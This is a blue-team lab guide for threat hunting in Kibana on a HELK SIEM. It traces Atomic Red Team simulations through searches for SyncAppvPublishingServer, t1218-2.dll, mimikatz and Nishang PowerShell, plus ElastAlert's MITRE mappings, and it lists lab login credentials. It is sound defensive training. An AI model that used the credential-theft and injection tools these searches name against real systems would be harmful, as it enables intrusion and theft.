L1200-Blue Atomic Red Team

• Search In Kibana
  • Login to Member Server (WS01)
  • Access Kibana on the (H)ELK SIEM
  • SyncAppv Executable
  • t1218-2.dll
• Elastic Queries with Kibana
  • mimikatz
  • ElastAlert Index
  • Nishang-PowerShell
• Continuing the Hunt

Using the threat optics built in lab and knowledge gained, hunt for the ART techniques executed in L1200-red.

Investigate the Atomic Red Team framework. The ART framework is the gold standard for adversarial simulations.

Hunt for Indicators of Compromise related to those simulated attacks using the optics and knowledge gained during the prior exercises.

Search In Kibana

Kick off the hunt in Kibana!

Login to Member Server (WS01)

Connect via Remote Desktop to the Member Server (WS01).
See Lab L0200 for connection instructions.

Access Kibana on the (H)ELK SIEM

Using Chrome or Internet Explorer on Member Server, access the Kibana URI and login using the credentials below.

URL: https://10.10.98.20
Username: helk
Password: hunting

SyncAppv Executable

Another search in the Kibana UI for the SyncAppv executable (discovered in the technique’s YAML configuration file) might result in something like what is shown below.

syncappvpublishingserver

Add table columns as you feel appropriate.

You may find an outcome such as:

t1218-2.dll

A search for one of the DLLs referenced in the technique’s YAML file (t1218-2.dll) should find the inject attack and other “correlatable” evidence.

t1218-2.dll

Continue to the next portion of this lab.

Elastic Queries with Kibana

Continue to operate from the PowerShell session from the previous lab section From the Kibana interface, search mimikatz and refresh. The time window and refresh settings may need to be expanded. Review the results as demonstrated in previous labs by navigating the individual documents and adding the fields of interest.

mimikatz

mimikatz

ElastAlert Index

Switch the log index to elastalert-status-*.

elastalert-status-*

From the ElastAlert view, the recent attack should be mapped to a matching MITRE technique.

Nishang-PowerShell

This attack may also match against “Nishang-PowerShell-Commandlets”. | | |----------|

Continue hunting in the next section of the lab.

Continuing the Hunt

Continue from the previous lab section: Expand the document and toggle the options into the table columns:

• rule_name
• match_body.process_command_line
• and match_body.RuleName.

Shrink the document and review the ElastAlert view again. The sorted view should include the MITRE maps.

Explore the MITRE ATT&CK map (https://attack.mitre.org/) and test any technique of interest.

You have completed this lab.